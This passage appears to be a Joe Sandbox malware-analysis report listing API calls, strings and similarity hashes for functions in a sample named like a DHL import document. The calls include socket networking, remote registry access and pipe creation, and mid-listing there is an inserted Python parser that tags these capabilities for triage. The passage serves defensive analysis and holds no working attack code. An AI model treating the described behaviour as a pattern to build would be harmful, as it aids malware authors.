                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                          • String ID:
                                                                                          • API String ID: 3761583154-0
                                                                                          • Opcode ID: ea8d81fe35b51ac9e833a2a6a1a6888080c5049d19cb980a87ab7ddd57bebc49
                                                                                          • Instruction ID: 9e1834488b6f4b5e4876c3bcff22707b0aa164fd5f067aee00839a981212cbde
                                                                                          • Opcode Fuzzy Hash: ea8d81fe35b51ac9e833a2a6a1a6888080c5049d19cb980a87ab7ddd57bebc49
                                                                                          • Instruction Fuzzy Hash: 8821C471605208AFDB209FA9CC8CDBA77ECFB49364B108035F914CB2A0DA70DC41CBA8
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 008404F2
                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0084052E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHandlePipe
                                                                                          • String ID: nul
                                                                                          • API String ID: 1424370930-2873401336
                                                                                          • Opcode ID: 756427bd8106382749b4823e2ec7b516443f5705ebe32a85abd9224e878330dd
                                                                                          • Instruction ID: 3d8d021f56b6fb3ba7e3cd21106949c59da4d6ab11c88afa787431a581f483b9
                                                                                          • Opcode Fuzzy Hash: 756427bd8106382749b4823e2ec7b516443f5705ebe32a85abd9224e878330dd
                                                                                          • Instruction Fuzzy Hash: BB213075500309ABDF209F69DC44AAB7BA4FF45768F214A19FAA1E72E0D7B09950CF20
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 008405C6
                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00840601
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateHandlePipe
                                                                                          • String ID: nul
                                                                                          • API String ID: 1424370930-2873401336
                                                                                          • Opcode ID: 2328366ea37a70e71065f6d7a0431eedbcd4e3d1aa4c20e84cbdb35d01ae3c38
                                                                                          • Instruction ID: 449be12832d2d3bc7c7dab36f98d1b9e83323fe7712e256e805366a602b2a3ce
                                                                                          • Opcode Fuzzy Hash: 2328366ea37a70e71065f6d7a0431eedbcd4e3d1aa4c20e84cbdb35d01ae3c38
                                                                                          • Instruction Fuzzy Hash: 0B2181755003099BDB209F698C04AAB77E4FFA5724F214A19FEA2E72E0D7B09860CF10
                                                                                          APIs
                                                                                            • Part of subcall function 007D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
                                                                                            • Part of subcall function 007D600E: GetStockObject.GDI32(00000011), ref: 007D6060
                                                                                            • Part of subcall function 007D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A
                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00864112
                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0086411F
                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0086412A
                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00864139
                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00864145
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                          • String ID: Msctls_Progress32
                                                                                          • API String ID: 1025951953-3636473452
                                                                                          • Opcode ID: 0574ca5a9e92f38ec75be4a6fd14480f255682d5df053ac1a161b9cfa253dffa
                                                                                          • Instruction ID: 6f08ecb3b5e1d3317fe5aacef59b4cc337a6993d12e48a77f88cbcb3f556e08d
                                                                                          • Opcode Fuzzy Hash: 0574ca5a9e92f38ec75be4a6fd14480f255682d5df053ac1a161b9cfa253dffa
                                                                                          • Instruction Fuzzy Hash: 1111D0B214021DBEEF119E64CC86EEB7F6DFF09798F014111BA18E2150C6769C219BA4
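Every function record in this listing repeats the same layout: an APIs block of `name.MODULE(args), ref: ADDR` lines (callee calls prefixed with "Part of subcall function"), an optional Strings block, the Memory Dump Source and Joe Sandbox IDA Plugin metadata, and a Similarity block carrying the String ID, Opcode ID and fuzzy hashes. The Python below is an added example and not part of the Joe Sandbox report or its IDA plugin: it parses that layout into records so an analyst can pivot on imported modules, referenced strings and Opcode IDs instead of scrolling. The sample input is three records abbreviated from this page (Associated lines dropped); the capability map used for the triage tags is this example's own heuristic, not a sandbox signature.

```python
"""Parse Joe Sandbox per-function records into triage data (added example,
not part of the report: layout parser plus the example's own capability map)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Three records abbreviated from the listing above ('Associated' lines dropped).
SAMPLE = """\
APIs
  • Part of subcall function 0085304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
  • Part of subcall function 0085304E: _wcslen.LIBCMT ref: 0085309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00851112
• WSAGetLastError.WSOCK32 ref: 00851121
• closesocket.WSOCK32(00000000), ref: 008511F9
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
Similarity
• API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
• String ID:
• Opcode ID: 371e97c163c432d1a9ac3006f57f986caba3e78ae8a70b967a4d3319e6db6d6e
APIs
• lstrcmpiW.KERNEL32(?,?), ref: 0083CF45
• MoveFileW.KERNEL32(?,?), ref: 0083CF7F
• SHFileOperationW.SHELL32(?), ref: 0083D061
Strings
Similarity
• API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
• String ID: \\*.*
• Opcode ID: 2d108c66ad98642950b1cdb0040f9bd460b6fb82b854cf9b1a4cd4ae16a8586c
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 008404F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0084052E
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• Opcode ID: 756427bd8106382749b4823e2ec7b516443f5705ebe32a85abd9224e878330dd
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# 'name.MODULE(args), ref: ADDR', optionally prefixed by the subcall note.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)
# Heuristic API-name groups for triage tags: the example's own choice, not a sandbox signature.
CAPABILITIES = {
    "network": {"socket", "connect", "send", "recv", "inet_addr", "closesocket"},
    "file_ops": {"MoveFileW", "CopyFileW", "DeleteFileW", "SHFileOperationW"},
    "stdio_redirect": {"CreatePipe", "GetStdHandle"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                   # call-site address
    subcall_of: Optional[str]  # set when the call is inside a callee of this function


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # Source File, String ID, Opcode ID, ...

    @property
    def modules(self) -> List[str]:
        return sorted({a.module for a in self.apis})


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the listing at each 'APIs' header and collect the bullets per section."""
    records, current, section = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in SECTIONS:
            if line == "APIs":  # every function record starts with this header
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is not None and line.startswith("•"):
            body = line[1:].strip()
            if section != "APIs":
                key, _, value = body.partition(":")
                current.meta[key.strip()] = value.strip()
            elif m := API_RE.match(body):
                args = [a for a in (m.group("args") or "").split(",") if a]
                current.apis.append(ApiCall(m.group("name"), m.group("module"),
                                            args, m.group("ref"), m.group("sub")))
    return records


def tag_capabilities(rec: FunctionRecord) -> List[str]:
    names = {a.name for a in rec.apis}
    tags = {cap for cap, apis in CAPABILITIES.items() if names & apis}
    if any(a.module == "WSOCK32" for a in rec.apis):  # any Winsock import counts
        tags.add("network")
    return sorted(tags)


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.meta.get("Opcode ID", "?")[:16], rec.modules,
              tag_capabilities(rec), repr(rec.meta.get("String ID", "")))
```

Feed it the text of the full listing instead of `SAMPLE` to get one record per function; the Opcode ID and fuzzy hashes land in `meta` unchanged, so records from two reports can be joined on them, and `subcall_of` keeps calls made by callees apart from calls made directly by the function.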
                                                                                          APIs
                                                                                            • Part of subcall function 0080D7A3: _free.LIBCMT ref: 0080D7CC
                                                                                          • _free.LIBCMT ref: 0080D82D
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 0080D838
                                                                                          • _free.LIBCMT ref: 0080D843
                                                                                          • _free.LIBCMT ref: 0080D897
                                                                                          • _free.LIBCMT ref: 0080D8A2
                                                                                          • _free.LIBCMT ref: 0080D8AD
                                                                                          • _free.LIBCMT ref: 0080D8B8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                          • Instruction ID: fad197dcc1244177481bf05bc1e65ba4ca2ac2f9687b3afe4b4be191722346ff
                                                                                          • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                          • Instruction Fuzzy Hash: 2B112E71540B04AAE6A1BFF8CC4BFCB7BDCFF44700F404825B299E64D2DA75B5058662
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0083DA74
                                                                                          • LoadStringW.USER32(00000000), ref: 0083DA7B
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0083DA91
                                                                                          • LoadStringW.USER32(00000000), ref: 0083DA98
                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0083DADC
                                                                                          Strings
                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0083DAB9
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                          • API String ID: 4072794657-3128320259
                                                                                          • Opcode ID: ac57fb5f40c0197f75c92fe1fc886b52459c9b7d5a702937e196fc216b3216eb
                                                                                          • Instruction ID: fbfeac41f82d5d8ee06eae967376bfa9f0f815fe5f36d65987d1fe1090b6e4cf
                                                                                          • Opcode Fuzzy Hash: ac57fb5f40c0197f75c92fe1fc886b52459c9b7d5a702937e196fc216b3216eb
                                                                                          • Instruction Fuzzy Hash: D3014FF25002187FE710ABE49D89EFA766CF708301F401496F786E2041E6B49E844B74
                                                                                          APIs
                                                                                          • InterlockedExchange.KERNEL32(00D9EF98,00D9EF98), ref: 0084097B
                                                                                          • EnterCriticalSection.KERNEL32(00D9EF78,00000000), ref: 0084098D
                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 0084099B
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008409A9
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008409B8
                                                                                          • InterlockedExchange.KERNEL32(00D9EF98,000001F6), ref: 008409C8
                                                                                          • LeaveCriticalSection.KERNEL32(00D9EF78), ref: 008409CF
                                                                                          Similarity
                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 3495660284-0
                                                                                          • Opcode ID: fd12aa4c9d9554d5b301d7a1a8b27689d682af49ab547d0bcc93a97163f209a1
                                                                                          • Instruction ID: 722982687d4ef6000a47edde674ffb05aec2f59ee63b262c153b333fc54283cf
                                                                                          • Opcode Fuzzy Hash: fd12aa4c9d9554d5b301d7a1a8b27689d682af49ab547d0bcc93a97163f209a1
                                                                                          • Instruction Fuzzy Hash: 21F03C32442A02BBD7415FA4EE9CBE6BB39FF01702F412025F242909A1C7B59465CFA0
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?,?), ref: 007D5D30
                                                                                          • GetWindowRect.USER32(?,?), ref: 007D5D71
                                                                                          • ScreenToClient.USER32(?,?), ref: 007D5D99
                                                                                          • GetClientRect.USER32(?,?), ref: 007D5ED7
                                                                                          • GetWindowRect.USER32(?,?), ref: 007D5EF8
                                                                                          Similarity
                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                          • String ID:
                                                                                          • API String ID: 1296646539-0
                                                                                          • Opcode ID: 0fa9b6383501a4aa438a6b06655d11810584320e092292cdac4939154a7e445e
                                                                                          • Instruction ID: 0252f31971b6efa8bbdf313df7ded63c0cf48758054d10c1dac653079472ab5b
                                                                                          • Opcode Fuzzy Hash: 0fa9b6383501a4aa438a6b06655d11810584320e092292cdac4939154a7e445e
                                                                                          • Instruction Fuzzy Hash: 06B17A34A0078ADBDB10DFA8C4807EEB7F5FF58310F14951AE8AAD7250DB34AA91DB54
                                                                                          APIs
                                                                                          • __allrem.LIBCMT ref: 008000BA
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008000D6
                                                                                          • __allrem.LIBCMT ref: 008000ED
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0080010B
                                                                                          • __allrem.LIBCMT ref: 00800122
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00800140
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                          • String ID:
                                                                                          • API String ID: 1992179935-0
                                                                                          • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                          • Instruction ID: 0f0385c91fcdfdcebf9350d183a8348684148e0e794110d7802f00639b41d163
                                                                                          • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                          • Instruction Fuzzy Hash: 4C81E372A00B0A9BE7609E6CCC41B6AB3E9FF41724F24453AF651D73D1EB74D9408B91
                                                                                          APIs
                                                                                            • Part of subcall function 00853149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0085101C,00000000,?,?,00000000), ref: 00853195
                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00851DC0
                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00851DE1
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851DF2
                                                                                          • inet_ntoa.WSOCK32(?), ref: 00851E8C
                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00851EDB
                                                                                          • _strlen.LIBCMT ref: 00851F35
                                                                                            • Part of subcall function 008339E8: _strlen.LIBCMT ref: 008339F2
                                                                                            • Part of subcall function 007D6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,007ECF58,?,?,?), ref: 007D6DBA
                                                                                            • Part of subcall function 007D6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,007ECF58,?,?,?), ref: 007D6DED
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                          • String ID:
                                                                                          • API String ID: 1923757996-0
                                                                                          • Opcode ID: bd3f395d8ae1fdc3d05cfd82c26846ca40037d3b612c64c7cd58f998eac9ca09
                                                                                          • Instruction ID: 72d3e6f9fccd618c775250946c001c3855616ce3b1f0fc9ae202df3b378efd7f
                                                                                          • Opcode Fuzzy Hash: bd3f395d8ae1fdc3d05cfd82c26846ca40037d3b612c64c7cd58f998eac9ca09
                                                                                          • Instruction Fuzzy Hash: E8A1D231204340AFC724DF24C899F2ABBA5FF85318F54894DF8569B2A2CB75ED49CB91
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007F82D9,007F82D9,?,?,?,0080644F,00000001,00000001,8BE85006), ref: 00806258
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0080644F,00000001,00000001,8BE85006,?,?,?), ref: 008062DE
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008063D8
                                                                                          • __freea.LIBCMT ref: 008063E5
                                                                                            • Part of subcall function 00803820: RtlAllocateHeap.NTDLL(00000000,?,008A1444,?,007EFDF5,?,?,007DA976,00000010,008A1440,007D13FC,?,007D13C6,?,007D1129), ref: 00803852
                                                                                          • __freea.LIBCMT ref: 008063EE
                                                                                          • __freea.LIBCMT ref: 00806413
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1414292761-0
                                                                                          • Opcode ID: 32ba57176e4c3f681bc1456b994d918de332965fc12ee4ad0b3312f0dfddf4a6
                                                                                          • Instruction ID: 92be9e69ae4976502bff7e389ee3251380130b3f3b9ea80b9980087ac0c2c31a
                                                                                          • Opcode Fuzzy Hash: 32ba57176e4c3f681bc1456b994d918de332965fc12ee4ad0b3312f0dfddf4a6
                                                                                          • Instruction Fuzzy Hash: B351BE72A00216ABEB658F64CC81EAF77A9FF45754F164629F805DA2C0EB34DC70C6A1
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085BCCA
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085BD25
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0085BD6A
                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0085BD99
                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0085BDF3
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0085BDFF
                                                                                          Similarity
                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                          • String ID:
                                                                                          • API String ID: 1120388591-0
                                                                                          • Opcode ID: 3df7010c0eb003d183033ec67d4323dd495ec1e3f8b7a8bd52ef0bdc1834917f
                                                                                          • Instruction ID: 3b6607683a3f4165a144611f118caeb40531c818bc8d1923a0a1aab9aea000f0
                                                                                          • Opcode Fuzzy Hash: 3df7010c0eb003d183033ec67d4323dd495ec1e3f8b7a8bd52ef0bdc1834917f
                                                                                          • Instruction Fuzzy Hash: 4F813731208241EFD714DF24C895E2ABBE5FF84308F14855DF9998B2A2DB35ED49CB92
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(00000035), ref: 0082F7B9
                                                                                          • SysAllocString.OLEAUT32(00000001), ref: 0082F860
                                                                                          • VariantCopy.OLEAUT32(0082FA64,00000000), ref: 0082F889
                                                                                          • VariantClear.OLEAUT32(0082FA64), ref: 0082F8AD
                                                                                          • VariantCopy.OLEAUT32(0082FA64,00000000), ref: 0082F8B1
                                                                                          • VariantClear.OLEAUT32(?), ref: 0082F8BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                                          • String ID:
                                                                                          • API String ID: 3859894641-0
                                                                                          • Opcode ID: 8d6656878096a5bd262b9ecfd3f19baae89dbccaffadc43854327bc8f39c0cef
                                                                                          • Instruction ID: 0ccc168390f1fc41c67341390627517478dbb6801ad57e8e689dca455443b97c
                                                                                          • Opcode Fuzzy Hash: 8d6656878096a5bd262b9ecfd3f19baae89dbccaffadc43854327bc8f39c0cef
                                                                                          • Instruction Fuzzy Hash: 2551B331600324EACF24AB65E895B29B7B4FF45314B249477EA06DF293DB748CC0C796
                                                                                          APIs
                                                                                            • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 008494E5
                                                                                          • _wcslen.LIBCMT ref: 00849506
                                                                                          • _wcslen.LIBCMT ref: 0084952D
                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00849585
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$FileName$OpenSave
                                                                                          • String ID: X
                                                                                          • API String ID: 83654149-3081909835
                                                                                          • Opcode ID: c81fb665daab1b40c7d903e108b302fca4442def225af8fbd5d515768d5ad9a9
                                                                                          • Instruction ID: 2eaa5ef3cfdf1ac415c8de29cab1cf5acae2deb7803fa82e606b8f50f602400f
                                                                                          • Opcode Fuzzy Hash: c81fb665daab1b40c7d903e108b302fca4442def225af8fbd5d515768d5ad9a9
                                                                                          • Instruction Fuzzy Hash: 51E19E31604304DFC724DF24C885A6AB7E0FF85314F15896DE9999B3A2EB35ED05CB92
                                                                                          APIs
                                                                                            • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
                                                                                          • BeginPaint.USER32(?,?,?), ref: 007E9241
                                                                                          • GetWindowRect.USER32(?,?), ref: 007E92A5
                                                                                          • ScreenToClient.USER32(?,?), ref: 007E92C2
                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 007E92D3
                                                                                          • EndPaint.USER32(?,?,?,?,?), ref: 007E9321
                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008271EA
                                                                                            • Part of subcall function 007E9339: BeginPath.GDI32(00000000), ref: 007E9357
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                          • String ID:
                                                                                          • API String ID: 3050599898-0
                                                                                          • Opcode ID: 87abe63f4f5480d8f14eecedcac7a3d20e4d0539fce1cbb5ced7da40dc2bf059
                                                                                          • Instruction ID: f496609490f45d9eb5cfae87e6e53328883241418a4d25d64d4305ee33ff4861
                                                                                          • Opcode Fuzzy Hash: 87abe63f4f5480d8f14eecedcac7a3d20e4d0539fce1cbb5ced7da40dc2bf059
                                                                                          • Instruction Fuzzy Hash: 6341A071105250AFDB11DF26D888FBB7BA8FF5A320F140229FAA4C71A1C7759845DB62
                                                                                          APIs
                                                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0084080C
                                                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00840847
